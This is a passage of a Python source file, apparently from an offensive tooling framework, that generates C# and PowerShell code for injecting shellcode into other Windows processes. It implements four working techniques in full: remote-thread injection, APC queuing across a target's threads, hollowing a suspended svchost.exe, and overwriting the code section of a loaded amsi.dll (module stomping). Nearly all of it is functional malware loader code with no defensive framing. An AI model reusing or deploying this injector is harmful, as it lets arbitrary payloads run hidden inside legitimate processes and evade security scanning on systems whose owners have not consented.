        "    public static extern bool Thread32Next(IntPtr hSnapshot, ref THREADENTRY32 lpte);\n"
        "\n"
        '    [DllImport("kernel32.dll", SetLastError = true)]\n'
        "    public static extern bool CloseHandle(IntPtr hObject);\n"
        "\n"
        '    [DllImport("kernel32.dll", SetLastError = true)]\n'
        "    public static extern IntPtr OpenProcess(uint dwDesiredAccess, bool bInheritHandle, int dwProcessId);\n"
        "\n"
        '    [DllImport("kernel32.dll", SetLastError = true)]\n'
        "    public static extern IntPtr VirtualAllocEx(IntPtr hProcess, IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);\n"
        "\n"
        '    [DllImport("kernel32.dll", SetLastError = true)]\n'
        "    public static extern bool WriteProcessMemory(IntPtr hProcess, IntPtr lpBaseAddress, byte[] lpBuffer, uint nSize, out uint lpNumberOfBytesWritten);\n"
        "\n"
        '    [DllImport("kernel32.dll", SetLastError = true)]\n'
        "    public static extern bool VirtualProtectEx(IntPtr hProcess, IntPtr lpAddress, uint dwSize, uint flNewProtect, out uint lpflOldProtect);\n"
        "\n"
        '    [DllImport("kernel32.dll", SetLastError = true)]\n'
        "    public static extern IntPtr CreateRemoteThread(IntPtr hProcess, IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, out uint lpThreadId);\n"
        "\n"
        '    [DllImport("kernel32.dll", SetLastError = true)]\n'
        "    public static extern IntPtr OpenThread(uint dwDesiredAccess, bool bInheritHandle, uint dwThreadId);\n"
        "\n"
        '    [DllImport("kernel32.dll", SetLastError = true)]\n'
        "    public static extern uint QueueUserAPC(IntPtr pfnAPC, IntPtr hThread, IntPtr dwData);\n"
        "\n"
        '    [DllImport("kernel32.dll", SetLastError = true)]\n'
        "    public static extern uint WaitForSingleObject(IntPtr hHandle, uint dwMilliseconds);\n"
        "\n"
        '    [DllImport("kernel32.dll", SetLastError = true, CharSet = CharSet.Unicode)]\n'
        "    public static extern bool CreateProcessW(string lpApplicationName, string lpCommandLine, IntPtr lpProcessAttributes, IntPtr lpThreadAttributes, bool bInheritHandles, uint dwCreationFlags, IntPtr lpEnvironment, string lpCurrentDirectory, ref STARTUPINFO lpStartupInfo, out PROCESS_INFORMATION lpProcessInformation);\n"
        "\n"
        '    [DllImport("ntdll.dll", SetLastError = true)]\n'
        "    public static extern int NtUnmapViewOfSection(IntPtr hProcess, IntPtr lpBaseAddress);\n"
        "\n"
        '    [DllImport("kernel32.dll", SetLastError = true)]\n'
        "    public static extern bool GetThreadContext(IntPtr hThread, ref CONTEXT64 lpContext);\n"
        "\n"
        '    [DllImport("kernel32.dll", SetLastError = true)]\n'
        "    public static extern bool SetThreadContext(IntPtr hThread, ref CONTEXT64 lpContext);\n"
        "\n"
        '    [DllImport("kernel32.dll", SetLastError = true)]\n'
        "    public static extern uint ResumeThread(IntPtr hThread);\n"
        "\n"
        '    [DllImport("kernel32.dll", SetLastError = true)]\n'
        "    public static extern bool ReadProcessMemory(IntPtr hProcess, IntPtr lpBaseAddress, byte[] lpBuffer, uint nSize, out uint lpNumberOfBytesRead);\n"
        "\n"
        '    [DllImport("kernel32.dll", SetLastError = true, CharSet = CharSet.Ansi)]\n'
        "    public static extern IntPtr LoadLibraryExA(string lpLibFileName, IntPtr hFile, uint dwFlags);\n"
        "\n"
        '    [DllImport("kernel32.dll", SetLastError = true)]\n'
        "    public static extern bool FreeLibrary(IntPtr hLibModule);\n"
        "\n"
        '    [DllImport("kernel32.dll", SetLastError = true)]\n'
        "    public static extern bool VirtualProtect(IntPtr lpAddress, uint dwSize, uint flNewProtect, out uint lpflOldProtect);\n"
        "\n"
        "    [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)]\n"
        "    public struct STARTUPINFO {\n"
        "        public uint cb;\n"
        "        public string lpReserved;\n"
        "        public string lpDesktop;\n"
        "        public string lpTitle;\n"
        "        public uint dwX, dwY, dwXSize, dwYSize;\n"
        "        public uint dwXCountChars, dwYCountChars, dwFillAttribute, dwFlags;\n"
        "        public ushort wShowWindow, cbReserved2;\n"
        "        public IntPtr lpReserved2, hStdInput, hStdOutput, hStdError;\n"
        "    }\n"
        "\n"
        "    [StructLayout(LayoutKind.Sequential)]\n"
        "    public struct PROCESS_INFORMATION {\n"
        "        public IntPtr hProcess;\n"
        "        public IntPtr hThread;\n"
        "        public uint dwProcessId;\n"
        "        public uint dwThreadId;\n"
        "    }\n"
        "\n"
        "    [StructLayout(LayoutKind.Sequential, Pack = 16)]\n"
        "    public struct CONTEXT64 {\n"
        "        public ulong P1Home, P2Home, P3Home, P4Home, P5Home, P6Home;\n"
        "        public uint ContextFlags, MxCsr;\n"
        "        public ushort SegCs, SegDs, SegEs, SegFs, SegGs, SegSs;\n"
        "        public uint EFlags;\n"
        "        public ulong Dr0, Dr1, Dr2, Dr3, Dr6, Dr7;\n"
        "        public ulong Rax, Rcx, Rdx, Rbx, Rsp, Rbp, Rsi, Rdi;\n"
        "        public ulong R8, R9, R10, R11, R12, R13, R14, R15, Rip;\n"
        "    }\n"
        "\n"
    )


def _ps_technique_method(technique: str) -> str:
    """Return the C# method body for the selected injection technique."""
    if technique == "createthread":
        return _ps_createthread_method()
    if technique == "apc":
        return _ps_apc_method()
    if technique == "hollowing":
        return _ps_hollowing_method()
    if technique == "stomp":
        return _ps_stomp_method()
    return _ps_createthread_method()


def _ps_createthread_method() -> str:
    return (
        "    public static bool InjectShellcode(byte[] shellcode) {\n"
        "        try {\n"
        "            int pid = FindTargetProcess();\n"
        "            if (pid < 0) return false;\n"
        "            IntPtr hProcess = OpenProcess(PROCESS_ALL_ACCESS, false, pid);\n"
        "            if (hProcess == IntPtr.Zero) return false;\n"
        "            uint scLen = (uint)shellcode.Length;\n"
        "            IntPtr addr = VirtualAllocEx(hProcess, IntPtr.Zero, scLen, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);\n"
        "            if (addr == IntPtr.Zero) { CloseHandle(hProcess); return false; }\n"
        "            uint written;\n"
        "            if (!WriteProcessMemory(hProcess, addr, shellcode, scLen, out written)) { CloseHandle(hProcess); return false; }\n"
        "            uint oldProtect;\n"
        "            VirtualProtectEx(hProcess, addr, scLen, PAGE_EXECUTE_READ, out oldProtect);\n"
        "            uint threadId;\n"
        "            IntPtr hThread = CreateRemoteThread(hProcess, IntPtr.Zero, 0, addr, IntPtr.Zero, 0, out threadId);\n"
        "            if (hThread == IntPtr.Zero) { CloseHandle(hProcess); return false; }\n"
        "            WaitForSingleObject(hThread, INFINITE);\n"
        "            CloseHandle(hThread);\n"
        "            CloseHandle(hProcess);\n"
        "            return true;\n"
        "        } catch { return false; }\n"
        "    }\n"
    )


def _ps_apc_method() -> str:
    return (
        "    public static System.Collections.Generic.List<uint> EnumerateThreads(uint pid) {\n"
        "        var tids = new System.Collections.Generic.List<uint>();\n"
        "        IntPtr snap = CreateToolhelp32Snapshot(TH32CS_SNAPTHREAD, 0);\n"
        "        if (snap == IntPtr.Zero) return tids;\n"
        "        try {\n"
        "            THREADENTRY32 te = new THREADENTRY32();\n"
        "            te.dwSize = (uint)Marshal.SizeOf(typeof(THREADENTRY32));\n"
        "            if (!Thread32First(snap, ref te)) return tids;\n"
        "            do {\n"
        "                if (te.th32OwnerProcessID == pid) tids.Add(te.th32ThreadID);\n"
        "            } while (Thread32Next(snap, ref te));\n"
        "        } finally { CloseHandle(snap); }\n"
        "        return tids;\n"
        "    }\n"
        "\n"
        "    public static bool InjectShellcode(byte[] shellcode) {\n"
        "        try {\n"
        "            int pid = FindTargetProcess();\n"
        "            if (pid < 0) return false;\n"
        "            IntPtr hProcess = OpenProcess(PROCESS_ALL_ACCESS, false, pid);\n"
        "            if (hProcess == IntPtr.Zero) return false;\n"
        "            uint scLen = (uint)shellcode.Length;\n"
        "            IntPtr addr = VirtualAllocEx(hProcess, IntPtr.Zero, scLen, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);\n"
        "            if (addr == IntPtr.Zero) { CloseHandle(hProcess); return false; }\n"
        "            uint written;\n"
        "            if (!WriteProcessMemory(hProcess, addr, shellcode, scLen, out written)) { CloseHandle(hProcess); return false; }\n"
        "            uint oldProtect;\n"
        "            VirtualProtectEx(hProcess, addr, scLen, PAGE_EXECUTE_READ, out oldProtect);\n"
        "            var tids = EnumerateThreads((uint)pid);\n"
        "            if (tids.Count == 0) { CloseHandle(hProcess); return false; }\n"
        "            bool queued = false;\n"
        "            foreach (uint tid in tids) {\n"
        "                IntPtr hThread = OpenThread(THREAD_SET_CONTEXT | THREAD_SUSPEND_RESUME, false, tid);\n"
        "                if (hThread != IntPtr.Zero) {\n"
        "                    if (QueueUserAPC(addr, hThread, IntPtr.Zero) != 0) queued = true;\n"
        "                    CloseHandle(hThread);\n"
        "                }\n"
        "            }\n"
        "            CloseHandle(hProcess);\n"
        "            return queued;\n"
        "        } catch { return false; }\n"
        "    }\n"
    )


def _ps_hollowing_method() -> str:
    return (
        "    public static bool InjectShellcode(byte[] shellcode) {\n"
        "        try {\n"
        '            string targetExe = @"C:\\Windows\\System32\\svchost.exe";\n'
        "            STARTUPINFO si = new STARTUPINFO();\n"
        "            si.cb = (uint)Marshal.SizeOf(typeof(STARTUPINFO));\n"
        "            PROCESS_INFORMATION pi;\n"
        "            if (!CreateProcessW(targetExe, null, IntPtr.Zero, IntPtr.Zero, false, CREATE_SUSPENDED, IntPtr.Zero, null, ref si, out pi)) return false;\n"
        "            CONTEXT64 ctx = new CONTEXT64();\n"
        "            ctx.ContextFlags = CONTEXT_FULL;\n"
        "            if (!GetThreadContext(pi.hThread, ref ctx)) {\n"
        "                CloseHandle(pi.hProcess);\n"
        "                return false;\n"
        "            }\n"
        "            ulong imageBaseAddr = ctx.Rdx + 0x10;\n"
        "            byte[] addrBuf = new byte[8];\n"
        "            uint bytesRead;\n"
        "            ReadProcessMemory(pi.hProcess, (IntPtr)imageBaseAddr, addrBuf, 8, out bytesRead);\n"
        "            ulong originalBase = BitConverter.ToUInt64(addrBuf, 0);\n"
        "            NtUnmapViewOfSection(pi.hProcess, (IntPtr)originalBase);\n"
        "            uint scLen = (uint)shellcode.Length;\n"
        "            uint allocSize = scLen > 0x1000 ? scLen : 0x1000;\n"
        "            IntPtr remoteAddr = VirtualAllocEx(pi.hProcess, IntPtr.Zero, allocSize, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);\n"
        "            if (remoteAddr == IntPtr.Zero) { CloseHandle(pi.hProcess); return false; }\n"
        "            uint written;\n"
        "            if (!WriteProcessMemory(pi.hProcess, remoteAddr, shellcode, scLen, out written)) { CloseHandle(pi.hProcess); return false; }\n"
        "            ctx.Rcx = (ulong)remoteAddr;\n"
        "            if (!SetThreadContext(pi.hThread, ref ctx)) { CloseHandle(pi.hProcess); return false; }\n"
        "            ResumeThread(pi.hThread);\n"
        "            CloseHandle(pi.hThread);\n"
        "            CloseHandle(pi.hProcess);\n"
        "            return true;\n"
        "        } catch { return false; }\n"
        "    }\n"
    )


def _ps_stomp_method() -> str:
    return (
        "    public static IntPtr FindTextSection(IntPtr dllBase, out uint textSize) {\n"
        "        textSize = 0;\n"
        "        try {\n"
        "            ushort magic = (ushort)Marshal.ReadInt16(dllBase);\n"
        "            if (magic != 0x5A4D) return IntPtr.Zero;\n"
        "            int peOffset = Marshal.ReadInt32(dllBase, 0x3C);\n"
        "            uint peSig = (uint)Marshal.ReadInt32(dllBase, peOffset);\n"
        "            if (peSig != 0x00004550) return IntPtr.Zero;\n"
        "            ushort numSections = (ushort)Marshal.ReadInt16(dllBase, peOffset + 6);\n"
        "            ushort optHeaderSize = (ushort)Marshal.ReadInt16(dllBase, peOffset + 20);\n"
        "            int sectionStart = peOffset + 24 + optHeaderSize;\n"
        "            for (int i = 0; i < numSections; i++) {\n"
        "                int off = sectionStart + i * 40;\n"
        "                byte[] nameBytes = new byte[8];\n"
        "                Marshal.Copy((IntPtr)(dllBase.ToInt64() + off), nameBytes, 0, 8);\n"
        '                string name = System.Text.Encoding.ASCII.GetString(nameBytes).TrimEnd(\'\\0\');\n'
        '                if (name == ".text") {\n'
        "                    uint vaddr = (uint)Marshal.ReadInt32(dllBase, off + 12);\n"
        "                    textSize = (uint)Marshal.ReadInt32(dllBase, off + 8);\n"
        "                    return (IntPtr)(dllBase.ToInt64() + vaddr);\n"
        "                }\n"
        "            }\n"
        "        } catch { }\n"
        "        return IntPtr.Zero;\n"
        "    }\n"
        "\n"
        "    public static bool InjectShellcode(byte[] shellcode) {\n"
        "        try {\n"
        "            int pid = FindTargetProcess();\n"
        "            if (pid < 0) return false;\n"
        '            IntPtr hDll = LoadLibraryExA(@"C:\\Windows\\System32\\amsi.dll", IntPtr.Zero, DONT_RESOLVE_DLL_REFERENCES);\n'
        "            if (hDll == IntPtr.Zero) return false;\n"
        "            uint textSize;\n"
        "            IntPtr textAddr = FindTextSection(hDll, out textSize);\n"
        "            if (textAddr == IntPtr.Zero || textSize == 0) { FreeLibrary(hDll); return false; }\n"
        "            uint scLen = (uint)shellcode.Length;\n"
        "            if (scLen > textSize) { FreeLibrary(hDll); return false; }\n"
        "            IntPtr hProcess = OpenProcess(PROCESS_ALL_ACCESS, false, pid);\n"
        "            if (hProcess == IntPtr.Zero) { FreeLibrary(hDll); return false; }\n"
        "            uint oldProtect;\n"
        "            VirtualProtect(textAddr, scLen, PAGE_EXECUTE_READWRITE, out oldProtect);\n"
        "            uint written;\n"
        "            if (!WriteProcessMemory(hProcess, textAddr, shellcode, scLen, out written)) {\n"
        "                CloseHandle(hProcess); FreeLibrary(hDll); return false;\n"
        "            }\n"
        "            uint threadId;\n"
        "            IntPtr hThread = CreateRemoteThread(hProcess, IntPtr.Zero, 0, textAddr, IntPtr.Zero, 0, out threadId);\n"
        "            if (hThread == IntPtr.Zero) { CloseHandle(hProcess); FreeLibrary(hDll); return false; }\n"
        "            WaitForSingleObject(hThread, INFINITE);\n"
        "            CloseHandle(hThread);\n"
        "            CloseHandle(hProcess);\n"
        "            return true;\n"
        "        } catch { return false; }\n"
        "    }\n"
    )


def _ps_wrapper(technique: str) -> str:
    """Generate PowerShell wrapper that calls the C# InjectShellcode method."""
    return (
        "function inject_shellcode {\n"
        "    param([byte[]]$Shellcode)\n"
        "    try {\n"
        "        return [ProcessInjector]::InjectShellcode($Shellcode)\n"
        "    } catch {\n"
        "        return $false\n"
        "    }\n"
        "}\n"
    )
